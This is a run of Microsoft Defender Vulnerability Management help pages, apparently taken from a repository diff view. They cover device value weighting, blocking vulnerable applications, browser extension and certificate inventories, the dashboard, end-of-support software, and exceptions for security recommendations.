-Defining a device's value helps you differentiate between asset priorities. The device value is used to incorporate the risk appetite of an individual asset into the Defender Vulnerability Management exposure score calculation. Devices assigned as "high value" will receive more weight.
-
-You can also use the [set device value API](../defender-endpoint/set-device-value.md).
-
-Device value options:
--- Low-- Normal (Default)-- High-
-Examples of devices that should be assigned a high value:
--- Domain controllers, Active Directory-- Internet facing devices-- VIP devices-- Devices hosting internal/external production services-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Choose device value
-
-1. Navigate to any device page, the easiest place is from the device inventory.
-
-2. Select **Device value** from three dots next to the actions bar at the top of the page.
--
-3. A flyout will appear with the current device value and what it means. Review the value of the device and choose the one that best fits your device.
--
-## How device value impacts your exposure score
-
-The exposure score is a weighted average across all devices. If you have device groups, you can also filter the score by device group.
--- Normal devices have a weight of 1-- Low value devices have a weight of 0.75-- High value devices have a weight of NumberOfAssets / 10.
- - If you have 100 devices, each high value device will have a weight of 10 (100/10)
-
-## Related topics
--- [Exposure Score](tvm-exposure-score.md)
security Tvm Block Vuln Apps https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-block-vuln-apps.md
- Title: Block vulnerable applications.
-description: Use Microsoft Defender Vulnerability Management to block vulnerable applications.
-
-ms.pagetype: security
----
- - m365-security
- - Tier1
- Previously updated : 01/18/2024--
-# Block vulnerable applications
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!NOTE]
-> To use this feature you'll require Microsoft Defender Vulnerability Management Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer, the Defender Vulnerability Management add-on.
-
-Remediating vulnerabilities takes time and can be dependent on the responsibilities and resources of the IT team. Security admins can temporarily reduce the risk of a vulnerability by taking immediate action to block all currently known vulnerable versions of an application, until the remediation request is completed. The block option gives IT teams time to patch the application without security admins worrying that the vulnerabilities will be exploited in the meantime.
-
-While taking the remediation steps suggested by a security recommendation, security admins with the proper permissions can perform a mitigation action and block vulnerable versions of an application. File indicators of compromise (IOC)s are created for each of the executable files that belong to vulnerable versions of that application. Microsoft Defender Antivirus then enforces blocks on the devices that are in the specified scope.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Block or warn mitigation action
-
-The **block action** is intended to block all installed vulnerable versions of the application in your organization from running. For example, if there's an active zero-day vulnerability you can block your users from running the affected software while you determine work-around options.
-
-The **warn action** is intended to send a warning to your users when they open vulnerable versions of the application. Users can choose to bypass the warning and access the application for subsequent launches.
-
-For both actions, you can customize the message the users see. For example, you can encourage them to install the latest version. Additionally, you can provide a custom URL the users navigate to when they select the notification. Note that the user must select the body of the toast notification in order to navigate to the custom URL. This can be used to provide additional details specific to the application management in your organization.
-
-> [!NOTE]
-> The block and warn actions are typically enforced within a couple of minutes but can take up to 3 hours.
-
-## Minimum requirements
--- **Microsoft Defender Antivirus (active mode)**: The detection of file execution events and blocking requires Microsoft Defender Antivirus to be enabled in active mode. By design, passive mode and EDR in block mode can't detect and block based on file execution. To learn more, see [deploy Microsoft Defender Antivirus](../defender-endpoint/deploy-manage-report-microsoft-defender-antivirus.md).-- **Cloud-delivered protection (enabled)**: For more information, see [Manage cloud-based protection](../defender-endpoint/cloud-protection-microsoft-defender-antivirus.md).-- **Allow or block file (on)**: Go to **Settings** > **Endpoints** > **Advanced features** > **Allow or block file.** To learn more, see [Advanced features](../defender-endpoint/advanced-features.md).-
-## Version requirements
--- The Antimalware client version must be 4.18.1901.x or later.-- The Engine version must be 1.1.16200.x or later.-- Supported on Windows 10 devices, version 1809 or later, with the latest windows updates installed.-
-## Permissions
--- If you use [Role-based access control (RBAC)](../defender-endpoint/rbac.md), then you need to have the **Threat and vulnerability management - Application handling** permission assigned.-- If you haven't turned on RBAC, you must have one of the following Microsoft Entra roles assigned: **security admin** or **global admin**. To learn more about permissions, go to [Basic permissions](../defender-endpoint/basic-permissions.md).-
-## How to block vulnerable applications
-
-1. Go to **Vulnerability management** > **Recommendations** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select a security recommendation to see a flyout with more information.
-3. Select **Request remediation**.
-4. Select whether you want to apply the remediation and mitigation to all device groups or only a few.
-5. Select the remediation options on the **Remediation request** page. The remediation options are software update, software uninstall, and attention required.
-6. Pick a **Remediation due date** and select **Next**.
-7. Under **Mitigation action**, select **Block** or **Warn**. Once you submit a mitigation action, it's immediately applied.
-
- :::image type="content" alt-text="Mitigation action" source="../../media/defender-vulnerability-management/mitigation-action.png" lightbox="../../media/defender-vulnerability-management/mitigation-action.png":::
-
-8. Review the selections you made and **Submit request**. On the final page, you can choose to go directly to the remediation page to view the progress of remediation activities and see the list of blocked applications.
-
-> [!IMPORTANT]
-> Based on the available data, the block action will take effect on endpoints in the organization that have Microsoft Defender Antivirus. Microsoft Defender for Endpoint will make a best attempt effort of blocking the applicable vulnerable application or version from running.
-
-If additional vulnerabilities are found on a different version of an application, you get a new security recommendation, asking you to update the application, and you can choose to also block this different version.
-
-## When blocking isn't supported
-
-If you don't see the mitigation option while requesting a remediation, it's because the ability to block the application is currently not supported. Recommendations that don't include mitigation actions include:
--- Microsoft applications-- Recommendations related to operating systems-- Recommendations related to apps for macOS and Linux-- Apps where Microsoft doesn't have sufficient information or a high confidence to block-- Microsoft Store apps, which can't be blocked because they're signed by Microsoft-
-If you try to block an application and it doesn't work, you might have reached the maximum indicator capacity. If so, you can delete old indicators [Learn more about indicators](../defender-endpoint/manage-indicators.md).
-
-## View remediation activities
-
-After you've submitted the request, go to **Vulnerability management** > **Remediation** > **Activities** to see the newly created remediation activity.
-
-Filter by Mitigation type: Block and/or Warn to view all activities pertaining to block or warn actions.
-
-This is an activity log, and not the current block status of the application. Select the relevant activity to see a flyout panel with details including the remediation description, mitigation description and the device remediation status:
--
-## View blocked applications
-
-Find the list of blocked applications by going to **Remediation** > **Blocked applications** tab:
--
-Select a blocked application to view a flyout with details about the number of vulnerabilities, whether exploits are available, blocked versions, and remediation activities.
-
-The option to **View details of blocked versions in the Indicator page** brings you to the **Settings** > **Endpoints** > **Indicators** page where you can view the file hashes and response actions.
-
-> [!NOTE]
-> If you use the Indicators API with programmatic indicator queries as part of your workflows, be aware that the block action will give additional results.
->
-> Currently some detections related to warn policies may show up as active malware in Microsoft Defender XDR and/or Microsoft Intune. This behavior will be fixed in an upcoming release.
-
-You can also **Unblock software** or **Open software page**:
--
-## Unblock applications
-
-Select a blocked application to view the option to **Unblock software** in the flyout.
-
-After you've unblocked an application, refresh the page to see it removed from the list. It can take up to 3 hours for an application to be unblocked and become accessible to your users again.
-
-## Users experience for blocked applications
-
-When users try to access a blocked application, they receive a message informing them that the application was by their organization. This message is customizable.
-
-For applications where the warn mitigation option was applied, users receive a message informing them that the application has been blocked by their organization. The user has the option to bypass the block for subsequent launches, by choosing "Allow". This allow is only temporary, and the application will be blocked again after a while.
-
-> [!NOTE]
-> If your organization has deployed the DisableLocalAdminMerge group policy, you may experience instances where allowing an application does not take effect. This behavior will be fixed in an upcoming release.
-
-## End-user updating blocked applications
-
-A commonly asked question is how does an end-user update a blocked application? The block is enforced by blocking the executable file. Some applications, such as Firefox, rely on a separate update executable, which won't be blocked by this feature. In other cases when the application requires the main executable file to update, it's recommended to either implement the block in warn mode (so that the end-user can bypass the block) or the end-user can delete the application (if no vital information is stored on the client) and reinstalls the application.
-
-## Related articles
--- [Vulnerabilities in my organization](tvm-weaknesses.md)
security Tvm Browser Extensions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-browser-extensions.md
- Title: Browser extensions assessment
-description: Find out about the browsers extensions installed in your environment
-
-ms.pagetype: security
----
- - m365-security
- - Tier1
- Previously updated : 10/24/2023--
-# Browser extensions assessment
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-> [!NOTE]
-> To use this feature you'll require Microsoft Defender Vulnerability Management Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer, the Defender Vulnerability Management add-on.
-
-A browser extension is a small software application that adds functionality to a web browser. Visibility into the browser extensions installed can help you ensure the safe usage of extensions in your organization.
-
-The **Browser extensions** page displays a list of the browser extensions installed across different browsers in your organization. Browser extension details are collected across all the users that exist on a specific browser. For each installed extension, per browser, you can see the devices it's installed on, the users who installed it and if it's turned on or off on a device.
-
-The information available will not only help you learn about the installed extensions, but it can help you make decisions on how you want to manage the extensions.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## View your browser extensions
-
-1. Go to **Vulnerability management** \> **Inventories** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select the **Browser extensions** tab.
-
-> [!NOTE]
-> Browser extension assessment is only available on Windows devices. Only extensions that exist in Edge, Chrome, and Firefox, will appear in browser extension list.
-
-The **Browser extensions** page opens with a list of the browser extensions installed across your organization, including details on the extension name, browser, the number of devices the extension is installed on, and the number that have it turned on.
-
- :::image type="content" source="../../media/defender-vulnerability-management/browser_extensions.png" alt-text="Screenshot of the Browser extensions page" lightbox="../../media/defender-vulnerability-management/browser_extensions.png":::
-
-You can use the Browser filter to view the relevant list of extensions for a particular browser.
-
-The **Requested permissions** and **Permissions risk** columns provide more specific information on the number of permissions requested by the extension, and the permissions risk level based on the type of access to devices or sites it requested.
-
-Select a browser extension to open its flyout pane, where you can learn more about the extension:
-
- :::image type="content" source="../../media/defender-vulnerability-management/browser_extensions_details.png" alt-text="Screenshot of the Browser extensions details pane" lightbox="../../media/defender-vulnerability-management/browser_extensions_details.png":::
-
-Where applicable, there will be a link available on this page to access the extension in the store it was installed from.
-
-### Browser extension permissions
-
-Browser extensions usually need different types of permission to run properly, for example, they might require permission to modify a webpage.
-
-Select the **Permissions** tab, from the browser extension flyout pane, to see information on the permissions the browser extension needs to run, and whether this permission is optional or not.
-
- :::image type="content" source="../../media/defender-vulnerability-management/browser_extensions_permissions.png" alt-text="Screenshot of the Browser extensions permissions page" lightbox="../../media/defender-vulnerability-management/browser_extensions_permissions.png":::
-
-The permission risk level generated is based on the type of access the permission is requesting. You can use this information to help make an informed decision on whether you want to allow or block this extension.
-
-> [!NOTE]
-> Risk is subjective, and it's up to each organization to determine the types of risk they are willing to take on.
-
-Select a permission to see a further flyout with more information.
-
-### View installed devices
-
-To see the list of the devices the extension is installed on, choose the **Installed devices** tab from the browser extension flyout pane:
-
- :::image type="content" source="../../media/defender-vulnerability-management/browser_extensions_devices.png" alt-text="Screenshot of the Browser extensions devices tab" lightbox="../../media/defender-vulnerability-management/browser_extensions_devices.png":::
-
-From here, you can search for a particular device the extension is installed on, and you can export a list of the devices to a csv file.
-
-### View extension versions
-
-Select the **Extensions versions** tab, from the browser extension flyout pane, to see information on the versions of the extension installed in your organization.
-
- :::image type="content" source="../../media/defender-vulnerability-management/browser_extensions_versions.png" alt-text="Screenshot of the Browser extensions versions tab" lightbox="../../media/defender-vulnerability-management/browser_extensions_versions.png":::
-
-### View extensions users
-
-Select the **Users** tab, from the browser extension flyout pane, to see a list of users who installed the browser extension.
-
- :::image type="content" source="../../media/defender-vulnerability-management/tvm-browser-ext-user-filter.png" alt-text="Screenshot of the Browser extensions user tab." lightbox="../../media/defender-vulnerability-management/tvm-browser-ext-user-filter.png":::
-
-### Browser extensions on devices
-
-You can also view a list of extensions installed on a device:
-
-1. Select the device from the **Installed devices** tab in the flyout panel and select **Open device page** or select the device directly from the **Device inventory** page.
-2. Select **Inventories** and then **Browser extensions** to see a list of extensions installed on that device.
-
- :::image type="content" source="../../media/defender-vulnerability-management/browser_extensions_devicepage.png" alt-text="Screenshot of the Browser extensions in the devices page" lightbox="../../media/defender-vulnerability-management/browser_extensions_devicepage.png":::
-
-### Browser extension APIs
-
-You can use APIs to view all browser extensions installed in your organization, including installed versions, permissions requested, and associated risk. For more information, see:
--- [Export browser extensions assessment per device](../defender-endpoint/get-assessment-browser-extensions.md)-- [Get browser extensions permission information](../defender-endpoint/get-browser-extensions-permission-info.md)-
-### Use advanced hunting
-
-You can use advanced hunting queries to gain visibility on browser extensions in your organization. Find details about the browser extensions installed per device in the **DeviceTvmBrowserExtensions** table, or browser extension related information, including extensions permission information in the **DeviceTvmBrowserExtensionsKB** table.
-
-## Related articles
--- [Vulnerabilities in my organization](tvm-weaknesses.md)-- [Advanced hunting schema reference](../defender-endpoint/advanced-hunting-schema-reference.md)
security Tvm Certificate Inventory https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-certificate-inventory.md
- Title: Certificate inventory
-description: Find out about the certificates installed in your environment
-----
- - m365-security
- - Tier1
- Previously updated : 04/11/2022--
-# Certificate inventory
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan) -
-> [!NOTE]
-> To use this feature you'll require Microsoft Defender Vulnerability Management Standalone or if you're already a Microsoft Defender for Endpoint Plan 2 customer, the Defender Vulnerability Management add-on.
-
-Certificates can be used in multiple ways, this includes:
--- being part of the TLS\SSL protocol-- user certificates being used for VPN client authentication, document signing, email encryption and email signing-- providing data encryption and authentication to ensure the secure transfer of information within your network and over the internet-
-If there is an issue with a certificate, for example, it has expired or is misconfigured, it could leave your organization vulnerable, cause an outage, and have an impact on day-to-day business operations.
-
-The **Certificate inventory** lets you view a list of the certificates installed across your organization in a single central certificate inventory page. This can help you:
--- Identify certificates that are about to expire so you can update them and prevent service disruption-- Detect potential vulnerabilities due to the use of weak signature algorithm (e.g. SHA-1-RSA), short key size (e.g. RSA 512bit), or weak signature hash algorithm (e.g. MD5)-- Ensure compliance with regulatory guidelines and organizational policy-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## View your certificates
-
-1. Go to **Vulnerability management** > **Software inventory** in the [Microsoft Defender portal](https://security.microsoft.com).
-2. Select the **Certificates** tab.
-
-The **Certificate inventory** page opens with a list of the certificates installed across your organization, including details on the expiration date, key size, who issued the certificate, and the number of instances.
-
-> [!NOTE]
-> Only certificates found on Windows devices (in the local machine certificate store) will be displayed in certificate inventory list.
-
- :::image type="content" source="../../media/defender-vulnerability-management/certificate_inventory.png" alt-text="Screenshot of the certificate inventory list" lightbox="../../media/defender-vulnerability-management/certificate_inventory.png":::::::::
-
-## Gain insights into potentially vulnerable certificates
-
-At the top of the page, you can view the number of certificates that have been identified as potentially less secure and introduce risk into your organization. This includes the number of certificates that:
--- have already expired-- will expire in 60 days or less-- have a key size with fewer than 2048 bits, as they are considered less secure-- have a weak signature algorithm, like SHA-1 and MD5-- are considered vulnerable since they are self-signed-
-## Use filters on the certificate inventory page
-
-You can use filters to view the inventory based on:
--- **Certificate status:** view the certificates that have expired, are expiring soon, are issued with a future date, or are current-- **Self-signed:** view certificates that are self-signed-- **Key size:** view certificates that have a short key size or valid key size-- **Signature hash:** view certificates that have a weak signature hash or valid signature hash-- **Key usage:** view certificates with key usage values, such as digital signature, repudiation, and certificate signing-
-## Get more information on a discovered certificate
-
-When you select the certificate that you want to investigate, a flyout panel will open with the certificate details page:
-
- :::image type="content" source="../../media/defender-vulnerability-management/certificate_details.png" alt-text="Screenshot of the certificate details page" lightbox="../../media/defender-vulnerability-management/certificate_details.png":::
-
-You can select the **Issuing details** tab to see information on who the certificate was issued to and who it was issued by.
-
-### Certificates on devices
-
-To see the list of the devices the certificate is installed on, choose the **Installed devices** tab from the certificate flyout pane. From here, you can search for a particular device the certificate is installed on, and you can export a list of the devices to a csv file.
-
-You can also view a list of certificates installed on a device:
-
-1. Select the device from the **Installed devices** tab in the flyout panel or select the device directly from the **Device inventory** page.
-2. Select the **Certificate inventory** tab to see a list of certificates installed on that device.
-
- :::image type="content" source="../../media/defender-vulnerability-management/certificate_inventory_page.png" alt-text="Screenshot of the certificate inventory page" lightbox="../../media/defender-vulnerability-management/certificate_inventory_page.png":::
-
-3. Select a certificate to open the flyout with more information.
-
-## Vulnerability management dashboard widget
-
-See how many certificates have expired or are due to expire in the next 30, 60 or 90 days from the **Expiring certificates** widget available in the vulnerability management dashboard.
-
-Select **View all** to go to the certificate inventory page.
--
-## Use advanced hunting
-
-You can use advanced hunting queries to gain visibility on certificates in your organization. For example, using the **DeviceTvmCertificateInfo** table, you can query to show all expired certificates.
-
-## Related articles
--- [Vulnerabilities in my organization](tvm-weaknesses.md)-- [Advanced hunting schema reference](../defender-endpoint/advanced-hunting-schema-reference.md)
security Tvm Dashboard Insights https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-dashboard-insights.md
- Title: Microsoft Defender Vulnerability Management dashboard
-description: The Microsoft Defender Vulnerability Management dashboard can help SecOps and security admins address cybersecurity threats and build their organization's security resilience.
-----
- - m365-security
- - tier1
-- Previously updated : 03/04/2022--
-# Microsoft Defender Vulnerability Management dashboard
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan) -
-Defender vulnerability management provides both security administrators and security operations teams with unique value, including:
--- Real-time endpoint detection and response (EDR) insights correlated with endpoint vulnerabilities-- Invaluable device vulnerability context during incident investigations-- Built-in remediation processes through Microsoft Intune and Microsoft Endpoint Configuration Manager-
-You can use Defender Vulnerability Management dashboard in the Microsoft Defender portal to:
--- View your exposure score and Microsoft Secure Score for Devices, along with top security recommendations, software vulnerability, remediation activities, and exposed devices-- Correlate EDR insights with endpoint vulnerabilities and process them-- Select remediation options to triage and track the remediation tasks-- Select exception options and track active exceptions-
-> [!NOTE]
-> Devices that are not active in the last 30 days are not factored in on the data that reflects your organization's vulnerability management exposure score and Microsoft Secure Score for Devices.
-
-Watch this video for a quick overview of what is in the Defender Vulnerability Management dashboard.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4r1nv]
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Defender Vulnerability Management dashboard
--
-<br>
-
-****
-
-|Area|Description|
-|||
-|**Selected device groups (#/#)**|Filter the vulnerability management data you want to see in the dashboard and cards by device groups. What you select in the filter applies throughout the vulnerability management pages.|
-|[**Exposure score**](tvm-exposure-score.md)|See the current state of your organization's device exposure to threats and vulnerabilities. Several factors affect your organization's exposure score: weaknesses discovered in your devices, likelihood of your devices to be breached, value of the devices to your organization, and relevant alerts discovered with your devices. The goal is to lower the exposure score of your organization to be more secure. To reduce the score, you need to remediate the related security configuration issues listed in the security recommendations.|
-|[**Microsoft Secure Score for Devices**](tvm-microsoft-secure-score-devices.md)|See the security posture of the operating system, applications, network, accounts, and security controls of your organization. The goal is to remediate the related security configuration issues to increase your score for devices. Selecting the bars will take you to the **Security recommendation** page.|
-|**Device exposure distribution**|See how many devices are exposed based on their exposure level. Select a section in the doughnut chart to go to the **Devices list** page and view the affected device names, exposure level, risk level, and other details such as domain, operating system platform, its health state, when it was last seen, and its tags.|
-|**Expiring certificates**|See how many certificates have expired or are due to expire in the next 30, 60 or 90 days.|
-|**Top security recommendations**|See the collated security recommendations that are sorted and prioritized based on your organization's risk exposure and the urgency that it requires. Select **Show more** to see the rest of the security recommendations in the list. Select **Show exceptions** for the list of recommendations that have an exception.|
-|**Top vulnerable software**|Get real-time visibility into your organization's software inventory with a stack-ranked list of vulnerable software installed on your network's devices and how they impact your organizational exposure score. Select an item for details or **Show more** to see the rest of the vulnerable software list in the **Software inventory** page.|
-|**Top remediation activities**|Track the remediation activities generated from the security recommendations. You can select each item on the list to see the details in the **Remediation** page or select **Show more** to view the rest of the remediation activities, and active exceptions.|
-|**Top exposed devices**|View exposed device names and their exposure level. Select a device name from the list to go to the device page where you can view the alerts, risks, incidents, security recommendations, installed software, and discovered vulnerabilities associated with the exposed devices. Select **Show more** to see the rest of the exposed devices list. From the devices list, you can manage tags, initiate automated investigations, initiate a live response session, collect an investigation package, run antivirus scan, restrict app execution, and isolate device.|
-|
-
-## Related topics
--- [Exposure score](tvm-exposure-score.md)-- [Microsoft Secure Score for Devices](tvm-microsoft-secure-score-devices.md)-- [Security recommendations](tvm-security-recommendation.md)-- [Software inventory](tvm-software-inventory.md)-- [Event timeline](threat-and-vuln-mgt-event-timeline.md)
security Tvm End Of Support Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-end-of-support-software.md
- Title: Plan for end-of-support software and software versions
-description: Discover and plan for software and software versions that are no longer supported and won't receive security updates.
-keywords: threat and vulnerability management, Microsoft Defender for Endpoint tvm security recommendation, cybersecurity recommendation, actionable security recommendation, Microsoft Defender Vulnerability Management
-
-ms.sitesec: library
-ms.pagetype: security
----
- - m365-security-compliance
- - tier1
- Previously updated : 03/04/2022--
-# Plan for end-of-support software and software versions
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-End-of-support (EOS), otherwise known as end-of-life (EOL), for software or software versions means that they will no longer be supported or serviced, and will not receive security updates. When you use software or software versions with ended support, you're exposing your organization to security vulnerabilities, legal, and financial risks.
-
-It's crucial for Security and IT Administrators to work together and ensure that the organization's software inventory is configured for optimal results, compliance, and a healthy network ecosystem. They should examine the options to remove or replace apps that have reached end-of-support and update versions that are no longer supported. It's best to create and implement a plan **before** the end of support dates.
-
-> [!NOTE]
-> End-of-support capability is currently available only for Windows products.
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Find software or software versions that are no longer supported
-
-1. From the vulnerability management menu, navigate to [**Recommendations**](tvm-security-recommendation.md).
-2. Go to the **Filters** panel and look for the tags section. Select one or more of the EOS tag options. Then **Apply**.
--
-3. You'll see a list of recommendations related to software with ended support, software versions that are end of support, or versions with upcoming end of support. These tags are also visible in the [software inventory](tvm-software-inventory.md) page. Tags for versions with upcoming end of support will display up to 6 months in advance.
---
-## List of versions and dates
-
-To view a list of versions that have reached end of support, or end or support soon, and those dates, follow the below steps:
-
-1. A message will appear in the security recommendation flyout for software with versions that have reached end of support, or will reach end of support soon.
--
-2. Select the **version distribution** link to go to the software drill-down page. There, you can see a filtered list of versions with tags identifying them as end of support, or upcoming end of support.
--
-3. Select one of the versions in the table to open. For example, version 10.0.18362.1. A flyout will appear with the end of support date.
--
-Once you identify which software and software versions are vulnerable due to their end-of-support status, you must decide whether to update or remove them from your organization. Doing so will lower your organizations exposure to vulnerabilities and advanced persistent threats.
-
-## Related topics
--- [Microsoft Defender Vulnerability Management overview](defender-vulnerability-management.md)-- [Security recommendations](tvm-security-recommendation.md)-- [Software inventory](tvm-software-inventory.md)
security Tvm Exception https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-vulnerability-management/tvm-exception.md
- Title: Create and view exceptions for security recommendations
-description: Create and monitor exceptions for security recommendations in Microsoft Defender Vulnerability Management.
-----
- - m365-security
- - Tier1
- Previously updated : 03/04/2022--
-# Create and view exceptions for security recommendations
-
-**Applies to:**
--- [Microsoft Defender Vulnerability Management](https://go.microsoft.com/fwlink/?linkid=2229011)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Servers Plan 1 & 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan)-
-As an alternative to a remediation request when a recommendation isn't relevant at the moment, you can create exceptions for recommendations. If your organization has device groups, you'll be able to scope the exception to specific device groups. Exceptions can either be created for selected device groups, or for all device groups past and present.
-
-When an exception is created for a recommendation, the recommendation won't be active until the end of the exception duration. The recommendation state changes to **Full exception** or **Partial exception** (by device group).
-
-> [!TIP]
-> Did you know you can try all the features in Microsoft Defender Vulnerability Management for free? Find out how to [sign up for a free trial](../defender-vulnerability-management/defender-vulnerability-management-trial.md).
-
-## Permissions
-
-Only users with "exceptions handling" permissions can manage exceptions (including creating or canceling). [Learn more about RBAC roles](../defender-endpoint/user-roles.md).
-
-![View of exception handling permission.](../../media/defender-vulnerability-management/tvm-exception-permissions.png)
-
-## Create an exception
-
-Select a security recommendation you would like to create an exception for, and then select **Exception options** and fill out the form.
-
-![Showing where the button for "exception options" is location in a security recommendation flyout.](../../media/defender-vulnerability-management/tvm-exception-options.png)
-
-### Exception by device group
-
-Apply the exception to all current device groups or choose specific device groups. Future device groups won't be included in the exception. Device groups that already have an exception won't be displayed in the list. If you only select certain device groups, the recommendation state changes from "active" to "partial exception." The state changes to "full exception" if you select all the device groups.
-
-![Showing device group dropdown.](../../media/defender-vulnerability-management/tvm-exception-device-group-500.png)
-
-#### Filtered views
-
-If you've filtered by device group on any of the vulnerability management pages, only your filtered device groups appear as options.
-
-This is the button to filter by device group on any of the vulnerability management pages:
-
-![Showing selected device groups filter.](../../media/defender-vulnerability-management/tvm-selected-device-groups.png)
-
-Exception view with filtered device groups:
-
-![Showing filtered device group dropdown.](../../media/defender-vulnerability-management/tvm-exception-device-filter500.png)
-
-#### Large number of device groups
-
-If your organization has more than 20 device groups, select **Edit** next to the filtered device group option.
-
-![Showing how to edit large numbers of groups.](../../media/defender-vulnerability-management/tvm-exception-edit-groups.png)
-
-A flyout appears where you can search and choose device groups you want included. Select the check mark icon below Search to check/uncheck all.
-
-![Showing large device group flyout.](../../media/defender-vulnerability-management/tvm-exception-device-group-flyout-400.png)
-
-### Global exceptions
-
-If you have global administrator permissions, you'll be able to create and cancel a global exception. It affects **all** current and future device groups in your organization, and only a user with similar permission would be able to change it. The recommendation state changes from "active" to "full exception."
-
-![Showing global exception option.](../../media/defender-vulnerability-management/tvm-exception-global.png)
-
-Some things to keep in mind:
--- If a recommendation is under global exception, then newly created exceptions for device groups is suspended until the global exception has expired or been canceled. After that point, the new device group exceptions will go into effect until they expire.-- If a recommendation already has exceptions for specific device groups and a global exception is created, then the device group exception is suspended until it expires or the global exception is canceled before it expires.-
-### Justification
-
-Select your justification for the exception you need to file instead of remediating the security recommendation in question. Fill out the justification context, then set the exception duration.
-
-The following list details the justifications behind the exception options:
--- **Third party control** - A third party product or software already addresses this recommendation
- - Choosing this justification type lowers your exposure score and increases your secure score because your risk is reduced
-- **Alternate mitigation** - An internal tool already addresses this recommendation
- - Choosing this justification type lowers your exposure score and increases your secure score because your risk is reduced
-- **Risk accepted** - Poses low risk and/or implementing the recommendation is too expensive-- **Planned remediation (grace)** - Already planned but is awaiting execution or authorization-
-## View all exceptions
-
-Navigate to the **Exceptions** tab in the **Remediation** page. You can filter by justification, type, and status.
-
- Select an exception to open a flyout with more details. Exceptions per devices group will have a list of every device group the exception covers, which you can export. You can also view the related recommendation or cancel the exception.
-
-![Showing the "Exceptions" tab in the Remediation page.](../../media/defender-vulnerability-management/tvm-exception-view.png)
-
-## How to cancel an exception
-
-To cancel an exception, navigate to the **Exceptions** tab in the **Remediation** page. Select the exception.
-
-To cancel the exception for all device groups or for a global exception, select the **Cancel exception for all device groups** button. You'll only be able to cancel exceptions for device groups you have permissions for.
-
-![The cancel button.](../../media/defender-vulnerability-management/tvm-exception-cancel.png)
-
-### Cancel the exception for a specific device group
-
-Select the specific device group to cancel the exception for it. A flyout appears for the device group, and you can select **Cancel exception**.
-
-![Showing how to select a specific device group.](../../media/defender-vulnerability-management/tvm-exception-device-group-hover.png)
-
-## View impact after exceptions are applied
-
-In the Security Recommendations page, select **Customize columns** and check the boxes for **Exposed devices (after exceptions)** and **Impact (after exceptions)**.
-
-![Showing customize columns options.](../../media/defender-vulnerability-management/tvm-after-exceptions.png)
-
-The exposed devices (after exceptions) column shows the remaining devices that are still exposed to vulnerabilities after exceptions are applied. Exception justifications that affect the exposure include 'third party control' and 'alternate mitigation'. Other justifications don't reduce the exposure of a device, and they're still considered exposed.
-
-The impact (after exceptions) shows remaining impact to exposure score or secure score after exceptions are applied. Exception justifications that affect the scores include 'third party control' and 'alternate mitigation.' Other justifications don't reduce the exposure of a device, and so the exposure score and secure score don't change.
-
-![Showing the columns in the table.](../../media/defender-vulnerability-management/tvm-after-exceptions-table.png)
-
-## Related topics
